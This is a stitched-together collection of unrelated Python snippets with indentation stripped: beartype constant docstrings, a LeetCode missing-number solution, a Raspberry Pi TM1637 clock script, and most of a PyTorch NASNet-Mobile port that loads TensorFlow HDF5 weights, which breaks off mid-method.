current parameter or return value being type-checked by the current call).
'''
VAR_NAME_ARGS_LEN = '__beartype_args_len'
'''
Name of the local variable providing the **positional argument count** (i.e.,
number of positional arguments passed to the current call).
'''
VAR_NAME_RANDOM_INT = '__beartype_random_int'
'''
Name of the local variable providing a **pseudo-random integer** (i.e.,
unsigned 32-bit integer pseudo-randomly generated for subsequent use in
type-checking randomly indexed container items by the current call).
'''
|
class Solution:
def missingNumber(self, nums: List[int]) -> int:
# use Gauss's foumula
expected = len(nums) * (len(nums)+1) // 2
return expected - sum(nums)
|
import subprocess, time
import TM1637
import board
if __name__ == "__main__":
CLK = board.D6
DIO = board.D13
display = TM1637.TM1637(CLK, DIO)
display.hex(0xbeef)
time.sleep(5)
while True:
t = time.localtime()
display.numbers(t.tm_hour,t.tm_min)
time.sleep(60-(t.tm_sec%60))
|
import os
import h5py
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
#from models.nasnet.debug import read_output
######################################################################
## Load parameters from HDF5 to Dict
######################################################################
#from models.util import save_model
def load_conv2d(state_dict, path, name_pth, name_tf):
h5f = h5py.File(path + '/' + name_tf + '.h5', 'r')
state_dict[name_pth + '.weight'] = torch.from_numpy(h5f['weight'][()]).permute(3, 2, 0, 1)
try:
state_dict[name_pth + '.bias'] = torch.from_numpy(h5f['bias'][()])
except:
pass
h5f.close()
def load_linear(state_dict, path, name_pth, name_tf):
h5f = h5py.File(path + '/' + name_tf + '.h5', 'r')
state_dict[name_pth + '.weight'] = torch.from_numpy(h5f['weight'][()]).t()
try:
state_dict[name_pth + '.bias'] = torch.from_numpy(h5f['bias'][()])
except:
pass
h5f.close()
def load_bn(state_dict, path, name_pth, name_tf):
h5f = h5py.File(path + '/' + name_tf + '.h5', 'r')
state_dict[name_pth + '.weight'] = torch.from_numpy(h5f['gamma'][()])
state_dict[name_pth + '.bias'] = torch.from_numpy(h5f['beta'][()])
state_dict[name_pth + '.running_mean'] = torch.from_numpy(h5f['mean'][()])
state_dict[name_pth + '.running_var'] = torch.from_numpy(h5f['var'][()])
h5f.close()
def load_separable_conv2d(state_dict, path, name_pth, name_tf):
h5f = h5py.File(path + '/' + name_tf + '.h5', 'r')
state_dict[name_pth + '.depthwise_conv2d.weight'] = torch.from_numpy(h5f['depthwise_weight'][()]).permute(2, 3, 0,
1)
try:
state_dict[name_pth + '.depthwise_conv2d.bias'] = torch.from_numpy(h5f['depthwise_bias'][()])
except:
pass
state_dict[name_pth + '.pointwise_conv2d.weight'] = torch.from_numpy(h5f['pointwise_weight'][()]).permute(3, 2, 0,
1)
try:
state_dict[name_pth + '.pointwise_conv2d.bias'] = torch.from_numpy(h5f['pointwise_bias'][()])
except:
pass
h5f.close()
def load_cell_branch(state_dict, path, name_pth, name_tf, branch, kernel_size):
load_separable_conv2d(state_dict, path, name_pth=name_pth + '_{branch}.separable_1'.format(branch=branch),
name_tf=name_tf + '/{branch}/separable_{ks}x{ks}_1'.format(branch=branch, ks=kernel_size))
load_bn(state_dict, path, name_pth=name_pth + '_{branch}.bn_sep_1'.format(branch=branch),
name_tf=name_tf + '/{branch}/bn_sep_{ks}x{ks}_1'.format(branch=branch, ks=kernel_size))
load_separable_conv2d(state_dict, path, name_pth=name_pth + '_{branch}.separable_2'.format(branch=branch),
name_tf=name_tf + '/{branch}/separable_{ks}x{ks}_2'.format(branch=branch, ks=kernel_size))
load_bn(state_dict, path, name_pth=name_pth + '_{branch}.bn_sep_2'.format(branch=branch),
name_tf=name_tf + '/{branch}/bn_sep_{ks}x{ks}_2'.format(branch=branch, ks=kernel_size))
def load_cell_stem_0(state_dict, path, name_pth='cell_stem_0', name_tf='cell_stem_0'):
# conv 1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_1x1.conv', name_tf=name_tf + '/1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_1x1.bn', name_tf=name_tf + '/beginning_bn')
# comb_iter_0
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='right', kernel_size=7)
# comb_iter_1
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='right', kernel_size=7)
# comb_iter_2
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_2', name_tf=name_tf + '/comb_iter_2',
branch='right', kernel_size=5)
# comb_iter_4
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_4', name_tf=name_tf + '/comb_iter_4',
branch='left', kernel_size=3)
def load_cell_stem_1(state_dict, path, name_pth='cell_stem_1', name_tf='cell_stem_1'):
# conv 1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_1x1.conv', name_tf=name_tf + '/1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_1x1.bn', name_tf=name_tf + '/beginning_bn')
load_conv2d(state_dict, path, name_pth=name_pth + '.path_1.conv', name_tf=name_tf + '/path1_conv')
load_conv2d(state_dict, path, name_pth=name_pth + '.path_2.conv', name_tf=name_tf + '/path2_conv')
load_bn(state_dict, path, name_pth=name_pth + '.final_path_bn', name_tf=name_tf + '/final_path_bn')
# comb_iter_0
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='right', kernel_size=7)
# comb_iter_1
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='right', kernel_size=7)
# comb_iter_2
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_2', name_tf=name_tf + '/comb_iter_2',
branch='right', kernel_size=5)
# comb_iter_4
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_4', name_tf=name_tf + '/comb_iter_4',
branch='left', kernel_size=3)
def load_first_cell(state_dict, path, name_pth, name_tf):
# conv 1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_1x1.conv', name_tf=name_tf + '/1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_1x1.bn', name_tf=name_tf + '/beginning_bn')
# other path
load_conv2d(state_dict, path, name_pth=name_pth + '.path_1.conv', name_tf=name_tf + '/path1_conv')
load_conv2d(state_dict, path, name_pth=name_pth + '.path_2.conv', name_tf=name_tf + '/path2_conv')
load_bn(state_dict, path, name_pth=name_pth + '.final_path_bn', name_tf=name_tf + '/final_path_bn')
# comb_iter_0
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='right', kernel_size=3)
# comb_iter_1
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='right', kernel_size=3)
# comb_iter_4
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_4', name_tf=name_tf + '/comb_iter_4',
branch='left', kernel_size=3)
def load_normal_cell(state_dict, path, name_pth, name_tf):
# conv 1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_1x1.conv', name_tf=name_tf + '/1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_1x1.bn', name_tf=name_tf + '/beginning_bn')
# conv prev_1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_prev_1x1.conv', name_tf=name_tf + '/prev_1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_prev_1x1.bn', name_tf=name_tf + '/prev_bn')
# comb_iter_0
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='right', kernel_size=3)
# comb_iter_1
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='right', kernel_size=3)
# comb_iter_4
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_4', name_tf=name_tf + '/comb_iter_4',
branch='left', kernel_size=3)
def load_reduction_cell(state_dict, path, name_pth, name_tf):
# conv 1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_1x1.conv', name_tf=name_tf + '/1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_1x1.bn', name_tf=name_tf + '/beginning_bn')
# conv prev_1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_prev_1x1.conv', name_tf=name_tf + '/prev_1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_prev_1x1.bn', name_tf=name_tf + '/prev_bn')
# comb_iter_0
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='right', kernel_size=7)
# comb_iter_1
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='right', kernel_size=7)
# comb_iter_2
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_2', name_tf=name_tf + '/comb_iter_2',
branch='right', kernel_size=5)
# comb_iter_4
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_4', name_tf=name_tf + '/comb_iter_4',
branch='left', kernel_size=3)
def load(path):
state_dict = {}
# block1
load_conv2d(state_dict, path, name_pth='conv0.conv', name_tf='conv0')
load_bn(state_dict, path, name_pth='conv0.bn', name_tf='conv0_bn')
# cell_stem
load_cell_stem_0(state_dict, path, 'cell_stem_0', 'cell_stem_0')
load_cell_stem_1(state_dict, path, 'cell_stem_1', 'cell_stem_1')
load_first_cell(state_dict, path, 'cell_0', 'cell_0')
for i in range(1, 6):
load_normal_cell(state_dict, path, 'cell_' + str(i), 'cell_' + str(i))
load_reduction_cell(state_dict, path, 'reduction_cell_0', 'reduction_cell_0')
load_first_cell(state_dict, path, 'cell_6', 'cell_6')
for i in range(7, 12):
load_normal_cell(state_dict, path, 'cell_' + str(i), 'cell_' + str(i))
load_reduction_cell(state_dict, path, 'reduction_cell_1', 'reduction_cell_1')
load_first_cell(state_dict, path, 'cell_12', 'cell_12')
for i in range(13, 18):
load_normal_cell(state_dict, path, 'cell_' + str(i), 'cell_' + str(i))
load_linear(state_dict, path, 'linear', 'final_layer/FC')
return state_dict
class MaxPoolPad(nn.Module):
def __init__(self):
super(MaxPoolPad, self).__init__()
self.pad = nn.ZeroPad2d((1, 0, 1, 0))
self.pool = nn.MaxPool2d(3, stride=2, padding=1)
def forward(self, x):
x = self.pad(x)
x = self.pool(x)
x = x[:, :, 1:, 1:]
return x
class AvgPoolPad(nn.Module):
def __init__(self, stride=2, padding=1):
super(AvgPoolPad, self).__init__()
self.pad = nn.ZeroPad2d((1, 0, 1, 0))
self.pool = nn.AvgPool2d(3, stride=stride, padding=padding, count_include_pad=False)
def forward(self, x):
x = self.pad(x)
x = self.pool(x)
x = x[:, :, 1:, 1:]
return x
class SeparableConv2d(nn.Module):
def __init__(self, in_channels, out_channels, dw_kernel, dw_stride, dw_padding, bias=False):
super(SeparableConv2d, self).__init__()
self.depthwise_conv2d = nn.Conv2d(in_channels, in_channels, dw_kernel,
stride=dw_stride,
padding=dw_padding,
bias=bias,
groups=in_channels)
self.pointwise_conv2d = nn.Conv2d(in_channels, out_channels, 1, stride=1, bias=bias)
def forward(self, x):
x = self.depthwise_conv2d(x)
x = self.pointwise_conv2d(x)
return x
class BranchSeparables(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride, padding, bias=False):
super(BranchSeparables, self).__init__()
self.relu = nn.ReLU()
self.separable_1 = SeparableConv2d(in_channels, in_channels, kernel_size, stride, padding, bias=bias)
self.bn_sep_1 = nn.BatchNorm2d(in_channels, eps=0.001, momentum=0.1, affine=True)
self.relu1 = nn.ReLU()
self.separable_2 = SeparableConv2d(in_channels, out_channels, kernel_size, 1, padding, bias=bias)
self.bn_sep_2 = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.1, affine=True)
def forward(self, x):
x = self.relu(x)
x = self.separable_1(x)
x = self.bn_sep_1(x)
x = self.relu1(x)
x = self.separable_2(x)
x = self.bn_sep_2(x)
return x
class BranchSeparablesStem(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride, padding, bias=False):
super(BranchSeparablesStem, self).__init__()
self.relu = nn.ReLU()
self.separable_1 = SeparableConv2d(in_channels, out_channels, kernel_size, stride, padding, bias=bias)
self.bn_sep_1 = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.1, affine=True)
self.relu1 = nn.ReLU()
self.separable_2 = SeparableConv2d(out_channels, out_channels, kernel_size, 1, padding, bias=bias)
self.bn_sep_2 = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.1, affine=True)
def forward(self, x):
x = self.relu(x)
x = self.separable_1(x)
x = self.bn_sep_1(x)
x = self.relu1(x)
x = self.separable_2(x)
x = self.bn_sep_2(x)
return x
class BranchSeparablesReduction(BranchSeparables):
def __init__(self, in_channels, out_channels, kernel_size, stride, padding, z_padding=1, bias=False):
BranchSeparables.__init__(self, in_channels, out_channels, kernel_size, stride, padding, bias)
self.padding = nn.ZeroPad2d((z_padding, 0, z_padding, 0))
def forward(self, x):
x = self.relu(x)
x = self.padding(x)
x = self.separable_1(x)
x = x[:, :, 1:, 1:]
x = self.bn_sep_1(x)
x = self.relu1(x)
x = self.separable_2(x)
x = self.bn_sep_2(x)
return x
class CellStem0(nn.Module):
def __init__(self):
super(CellStem0, self).__init__()
self.conv_1x1 = nn.Sequential()
self.conv_1x1.add_module('relu', nn.ReLU())
self.conv_1x1.add_module('conv', nn.Conv2d(96, 42, 1, stride=1, bias=False))
self.conv_1x1.add_module('bn', nn.BatchNorm2d(42, eps=0.001, momentum=0.1, affine=True))
self.comb_iter_0_left = BranchSeparables(42, 42, 5, 2, 2)
self.comb_iter_0_right = BranchSeparablesStem(96, 42, 7, 2, 3, bias=False)
self.comb_iter_1_left = nn.MaxPool2d(3, stride=2, padding=1)
self.comb_iter_1_right = BranchSeparablesStem(96, 42, 7, 2, 3, bias=False)
self.comb_iter_2_left = nn.AvgPool2d(3, stride=2, padding=1, count_include_pad=False)
self.comb_iter_2_right = BranchSeparablesStem(96, 42, 5, 2, 2, bias=False)
self.comb_iter_3_right = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_4_left = BranchSeparables(42, 42, 3, 1, 1, bias=False)
self.comb_iter_4_right = nn.MaxPool2d(3, stride=2, padding=1)
def forward(self, x):
x1 = self.conv_1x1(x)
x_comb_iter_0_left = self.comb_iter_0_left(x1)
x_comb_iter_0_right = self.comb_iter_0_right(x)
x_comb_iter_0 = x_comb_iter_0_left + x_comb_iter_0_right
x_comb_iter_1_left = self.comb_iter_1_left(x1)
x_comb_iter_1_right = self.comb_iter_1_right(x)
x_comb_iter_1 = x_comb_iter_1_left + x_comb_iter_1_right
x_comb_iter_2_left = self.comb_iter_2_left(x1)
x_comb_iter_2_right = self.comb_iter_2_right(x)
x_comb_iter_2 = x_comb_iter_2_left + x_comb_iter_2_right
x_comb_iter_3_right = self.comb_iter_3_right(x_comb_iter_0)
x_comb_iter_3 = x_comb_iter_3_right + x_comb_iter_1
x_comb_iter_4_left = self.comb_iter_4_left(x_comb_iter_0)
x_comb_iter_4_right = self.comb_iter_4_right(x1)
x_comb_iter_4 = x_comb_iter_4_left + x_comb_iter_4_right
x_out = torch.cat([x_comb_iter_1, x_comb_iter_2, x_comb_iter_3, x_comb_iter_4], 1)
return x_out
class CellStem1(nn.Module):
def __init__(self):
super(CellStem1, self).__init__()
self.conv_1x1 = nn.Sequential()
self.conv_1x1.add_module('relu', nn.ReLU())
self.conv_1x1.add_module('conv', nn.Conv2d(168, 84, 1, stride=1, bias=False))
self.conv_1x1.add_module('bn', nn.BatchNorm2d(84, eps=0.001, momentum=0.1, affine=True))
self.relu = nn.ReLU()
self.path_1 = nn.Sequential()
self.path_1.add_module('avgpool', nn.AvgPool2d(1, stride=2, count_include_pad=False))
self.path_1.add_module('conv', nn.Conv2d(96, 42, 1, stride=1, bias=False))
self.path_2 = nn.ModuleList()
self.path_2.add_module('pad', nn.ZeroPad2d((0, 1, 0, 1)))
self.path_2.add_module('avgpool', nn.AvgPool2d(1, stride=2, count_include_pad=False))
self.path_2.add_module('conv', nn.Conv2d(96, 42, 1, stride=1, bias=False))
self.final_path_bn = nn.BatchNorm2d(84, eps=0.001, momentum=0.1, affine=True)
self.comb_iter_0_left = BranchSeparables(84, 84, 5, 2, 2, bias=False)
self.comb_iter_0_right = BranchSeparables(84, 84, 7, 2, 3, bias=False)
self.comb_iter_1_left = nn.MaxPool2d(3, stride=2, padding=1)
self.comb_iter_1_right = BranchSeparables(84, 84, 7, 2, 3, bias=False)
self.comb_iter_2_left = nn.AvgPool2d(3, stride=2, padding=1, count_include_pad=False)
self.comb_iter_2_right = BranchSeparables(84, 84, 5, 2, 2, bias=False)
self.comb_iter_3_right = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_4_left = BranchSeparables(84, 84, 3, 1, 1, bias=False)
self.comb_iter_4_right = nn.MaxPool2d(3, stride=2, padding=1)
def forward(self, x_conv0, x_stem_0):
x_left = self.conv_1x1(x_stem_0)
x_relu = self.relu(x_conv0)
# path 1
x_path1 = self.path_1(x_relu)
# path 2
x_path2 = self.path_2.pad(x_relu)
x_path2 = x_path2[:, :, 1:, 1:]
x_path2 = self.path_2.avgpool(x_path2)
x_path2 = self.path_2.conv(x_path2)
# final path
x_right = self.final_path_bn(torch.cat([x_path1, x_path2], 1))
x_comb_iter_0_left = self.comb_iter_0_left(x_left)
x_comb_iter_0_right = self.comb_iter_0_right(x_right)
x_comb_iter_0 = x_comb_iter_0_left + x_comb_iter_0_right
x_comb_iter_1_left = self.comb_iter_1_left(x_left)
x_comb_iter_1_right = self.comb_iter_1_right(x_right)
x_comb_iter_1 = x_comb_iter_1_left + x_comb_iter_1_right
x_comb_iter_2_left = self.comb_iter_2_left(x_left)
x_comb_iter_2_right = self.comb_iter_2_right(x_right)
x_comb_iter_2 = x_comb_iter_2_left + x_comb_iter_2_right
x_comb_iter_3_right = self.comb_iter_3_right(x_comb_iter_0)
x_comb_iter_3 = x_comb_iter_3_right + x_comb_iter_1
x_comb_iter_4_left = self.comb_iter_4_left(x_comb_iter_0)
x_comb_iter_4_right = self.comb_iter_4_right(x_left)
x_comb_iter_4 = x_comb_iter_4_left + x_comb_iter_4_right
x_out = torch.cat([x_comb_iter_1, x_comb_iter_2, x_comb_iter_3, x_comb_iter_4], 1)
return x_out
class FirstCell(nn.Module):
def __init__(self, in_channels_left, out_channels_left, in_channels_right, out_channels_right):
super(FirstCell, self).__init__()
self.conv_1x1 = nn.Sequential()
self.conv_1x1.add_module('relu', nn.ReLU())
self.conv_1x1.add_module('conv', nn.Conv2d(in_channels_right, out_channels_right, 1, stride=1, bias=False))
self.conv_1x1.add_module('bn', nn.BatchNorm2d(out_channels_right, eps=0.001, momentum=0.1, affine=True))
self.relu = nn.ReLU()
self.path_1 = nn.Sequential()
self.path_1.add_module('avgpool', nn.AvgPool2d(1, stride=2, count_include_pad=False))
self.path_1.add_module('conv', nn.Conv2d(in_channels_left, out_channels_left, 1, stride=1, bias=False))
self.path_2 = nn.ModuleList()
self.path_2.add_module('pad', nn.ZeroPad2d((0, 1, 0, 1)))
self.path_2.add_module('avgpool', nn.AvgPool2d(1, stride=2, count_include_pad=False))
self.path_2.add_module('conv', nn.Conv2d(in_channels_left, out_channels_left, 1, stride=1, bias=False))
self.final_path_bn = nn.BatchNorm2d(out_channels_left * 2, eps=0.001, momentum=0.1, affine=True)
self.comb_iter_0_left = BranchSeparables(out_channels_right, out_channels_right, 5, 1, 2, bias=False)
self.comb_iter_0_right = BranchSeparables(out_channels_right, out_channels_right, 3, 1, 1, bias=False)
self.comb_iter_1_left = BranchSeparables(out_channels_right, out_channels_right, 5, 1, 2, bias=False)
self.comb_iter_1_right = BranchSeparables(out_channels_right, out_channels_right, 3, 1, 1, bias=False)
self.comb_iter_2_left = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_3_left = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_3_right = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_4_left = BranchSeparables(out_channels_right, out_channels_right, 3, 1, 1, bias=False)
def forward(self, x, x_prev):
x_relu = self.relu(x_prev)
# path 1
x_path1 = self.path_1(x_relu)
# path 2
x_path2 = self.path_2.pad(x_relu)
x_path2 = x_path2[:, :, 1:, 1:]
x_path2 = self.path_2.avgpool(x_path2)
x_path2 = self.path_2.conv(x_path2)
# final path
x_left = self.final_path_bn(torch.cat([x_path1, x_path2], 1))
x_right = self.conv_1x1(x)
x_comb_iter_0_left = self.comb_iter_0_left(x_right)
x_comb_iter_0_right = self.comb_iter_0_right(x_left)
x_comb_iter_0 = x_comb_iter_0_left + x_comb_iter_0_right
x_comb_iter_1_left = self.comb_iter_1_left(x_left)
x_comb_iter_1_right = self.comb_iter_1_right(x_left)
x_comb_iter_1 = x_comb_iter_1_left + x_comb_iter_1_right
x_comb_iter_2_left = self.comb_iter_2_left(x_right)
x_comb_iter_2 = x_comb_iter_2_left + x_left
x_comb_iter_3_left = self.comb_iter_3_left(x_left)
x_comb_iter_3_right = self.comb_iter_3_right(x_left)
x_comb_iter_3 = x_comb_iter_3_left + x_comb_iter_3_right
x_comb_iter_4_left = self.comb_iter_4_left(x_right)
x_comb_iter_4 = x_comb_iter_4_left + x_right
x_out = torch.cat([x_left, x_comb_iter_0, x_comb_iter_1, x_comb_iter_2, x_comb_iter_3, x_comb_iter_4], 1)
return x_out
class NormalCell(nn.Module):
def __init__(self, in_channels_left, out_channels_left, in_channels_right, out_channels_right):
super(NormalCell, self).__init__()
self.conv_prev_1x1 = nn.Sequential()
self.conv_prev_1x1.add_module('relu', nn.ReLU())
self.conv_prev_1x1.add_module('conv', nn.Conv2d(in_channels_left, out_channels_left, 1, stride=1, bias=False))
self.conv_prev_1x1.add_module('bn', nn.BatchNorm2d(out_channels_left, eps=0.001, momentum=0.1, affine=True))
self.conv_1x1 = nn.Sequential()
self.conv_1x1.add_module('relu', nn.ReLU())
self.conv_1x1.add_module('conv', nn.Conv2d(in_channels_right, out_channels_right, 1, stride=1, bias=False))
self.conv_1x1.add_module('bn', nn.BatchNorm2d(out_channels_right, eps=0.001, momentum=0.1, affine=True))
self.comb_iter_0_left = BranchSeparables(out_channels_right, out_channels_right, 5, 1, 2, bias=False)
self.comb_iter_0_right = BranchSeparables(out_channels_left, out_channels_left, 3, 1, 1, bias=False)
self.comb_iter_1_left = BranchSeparables(out_channels_left, out_channels_left, 5, 1, 2, bias=False)
self.comb_iter_1_right = BranchSeparables(out_channels_left, out_channels_left, 3, 1, 1, bias=False)
self.comb_iter_2_left = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_3_left = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_3_right = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_4_left = BranchSeparables(out_channels_right, out_channels_right, 3, 1, 1, bias=False)
def forward(self, x, x_prev):
x_left = self.conv_prev_1x1(x_prev)
x_right = self.conv_1x1(x)
x_comb_iter_0_left = self.comb_iter_0_left(x_right)
x_comb_iter_0_right = self.comb_iter_0_right(x_left)
x_comb_iter_0 = x_comb_iter_0_left + x_comb_iter_0_right
x_comb_iter_1_left = self.comb_iter_1_left(x_left)
x_comb_iter_1_right = self.comb_iter_1_right(x_left)
x_comb_iter_1 = x_comb_iter_1_left + x_comb_iter_1_right
x_comb_iter_2_left = self.comb_iter_2_left(x_right)
x_comb_iter_2 = x_comb_iter_2_left + x_left
x_comb_iter_3_left = self.comb_iter_3_left(x_left)
x_comb_iter_3_right = self.comb_iter_3_right(x_left)
x_comb_iter_3 = x_comb_iter_3_left + x_comb_iter_3_right
x_comb_iter_4_left = self.comb_iter_4_left(x_right)
x_comb_iter_4 = x_comb_iter_4_left + x_right
x_out = torch.cat([x_left, x_comb_iter_0, x_comb_iter_1, x_comb_iter_2, x_comb_iter_3, x_comb_iter_4], 1)
return x_out
class ReductionCell0(nn.Module):
def __init__(self, in_channels_left, out_channels_left, in_channels_right, out_channels_right):
super(ReductionCell0, self).__init__()
self.conv_prev_1x1 = nn.Sequential()
self.conv_prev_1x1.add_module('relu', nn.ReLU())
self.conv_prev_1x1.add_module('conv', nn.Conv2d(in_channels_left, out_channels_left, 1, stride=1, bias=False))
self.conv_prev_1x1.add_module('bn', nn.BatchNorm2d(out_channels_left, eps=0.001, momentum=0.1, affine=True))
self.conv_1x1 = nn.Sequential()
self.conv_1x1.add_module('relu', nn.ReLU())
self.conv_1x1.add_module('conv', nn.Conv2d(in_channels_right, out_channels_right, 1, stride=1, bias=False))
self.conv_1x1.add_module('bn', nn.BatchNorm2d(out_channels_right, eps=0.001, momentum=0.1, affine=True))
self.comb_iter_0_left = BranchSeparablesReduction(out_channels_right, out_channels_right, 5, 2, 2, bias=False)
self.comb_iter_0_right = BranchSeparablesReduction(out_channels_right, out_channels_right, 7, 2, 3, bias=False)
self.comb_iter_1_left = MaxPoolPad()
self.comb_iter_1_right = BranchSeparablesReduction(out_channels_right, out_channels_right, 7, 2, 3, bias=False)
self.comb_iter_2_left = AvgPoolPad()
self.comb_iter_2_right = BranchSeparablesReduction(out_channels_right, out_channels_right, 5, 2, 2, bias=False)
self.comb_iter_3_right = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_4_left = BranchSeparablesReduction(out_channels_right, out_channels_right, 3, 1, 1, bias=False)
self.comb_iter_4_right = MaxPoolPad()
def forward(self, x, x_prev):
x_left = self.conv_prev_1x1(x_prev)
x_right = self.conv_1x1(x)
x_comb_iter_0_left = self.comb_iter_0_left(x_right)
x_comb_iter_0_right = self.comb_iter_0_right(x_left)
x_comb_iter_0 = x_comb_iter_0_left + x_comb_iter_0_right
x_comb_iter_1_left = self.comb_iter_1_left(x_right)
x_comb_iter_1_right = self.comb_iter_1_right(x_left)
x_comb_iter_1 = x_comb_iter_1_left + x_comb_iter_1_right
x_comb_iter_2_left = self.comb_iter_2_left(x_right)
x_comb_iter_2_right = self.comb_iter_2_right(x_left)
x_comb_iter_2 = x_comb_iter_2_left + x_comb_iter_2_right
x_comb_iter_3_right = self.comb_iter_3_right(x_comb_iter_0)
x_comb_iter_3 = x_comb_iter_3_right + x_comb_iter_1
x_comb_iter_4_left = self.comb_iter_4_left(x_comb_iter_0)
x_comb_iter_4_right = self.comb_iter_4_right(x_right)
x_comb_iter_4 = x_comb_iter_4_left + x_comb_iter_4_right
x_out = torch.cat([x_comb_iter_1, x_comb_iter_2, x_comb_iter_3, x_comb_iter_4], 1)
return x_out
class ReductionCell1(nn.Module):
def __init__(self, in_channels_left, out_channels_left, in_channels_right, out_channels_right):
super(ReductionCell1, self).__init__()
self.conv_prev_1x1 = nn.Sequential()
self.conv_prev_1x1.add_module('relu', nn.ReLU())
self.conv_prev_1x1.add_module('conv', nn.Conv2d(in_channels_left, out_channels_left, 1, stride=1, bias=False))
self.conv_prev_1x1.add_module('bn', nn.BatchNorm2d(out_channels_left, eps=0.001, momentum=0.1, affine=True))
self.conv_1x1 = nn.Sequential()
self.conv_1x1.add_module('relu', nn.ReLU())
self.conv_1x1.add_module('conv', nn.Conv2d(in_channels_right, out_channels_right, 1, stride=1, bias=False))
self.conv_1x1.add_module('bn', nn.BatchNorm2d(out_channels_right, eps=0.001, momentum=0.1, affine=True))
self.comb_iter_0_left = BranchSeparables(out_channels_right, out_channels_right, 5, 2, 2, bias=False)
self.comb_iter_0_right = BranchSeparables(out_channels_right, out_channels_right, 7, 2, 3, bias=False)
self.comb_iter_1_left = nn.MaxPool2d(3, stride=2, padding=1)
self.comb_iter_1_right = BranchSeparables(out_channels_right, out_channels_right, 7, 2, 3, bias=False)
self.comb_iter_2_left = nn.AvgPool2d(3, stride=2, padding=1, count_include_pad=False)
self.comb_iter_2_right = BranchSeparables(out_channels_right, out_channels_right, 5, 2, 2, bias=False)
self.comb_iter_3_right = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_4_left = BranchSeparables(out_channels_right, out_channels_right, 3, 1, 1, bias=False)
self.comb_iter_4_right = nn.MaxPool2d(3, stride=2, padding=1)
def forward(self, x, x_prev):
x_left = self.conv_prev_1x1(x_prev)
x_right = self.conv_1x1(x)
x_comb_iter_0_left = self.comb_iter_0_left(x_right)
x_comb_iter_0_right = self.comb_iter_0_right(x_left)
x_comb_iter_0 = x_comb_iter_0_left + x_comb_iter_0_right
x_comb_iter_1_left = self.comb_iter_1_left(x_right)
x_comb_iter_1_right = self.comb_iter_1_right(x_left)
x_comb_iter_1 = x_comb_iter_1_left + x_comb_iter_1_right
x_comb_iter_2_left = self.comb_iter_2_left(x_right)
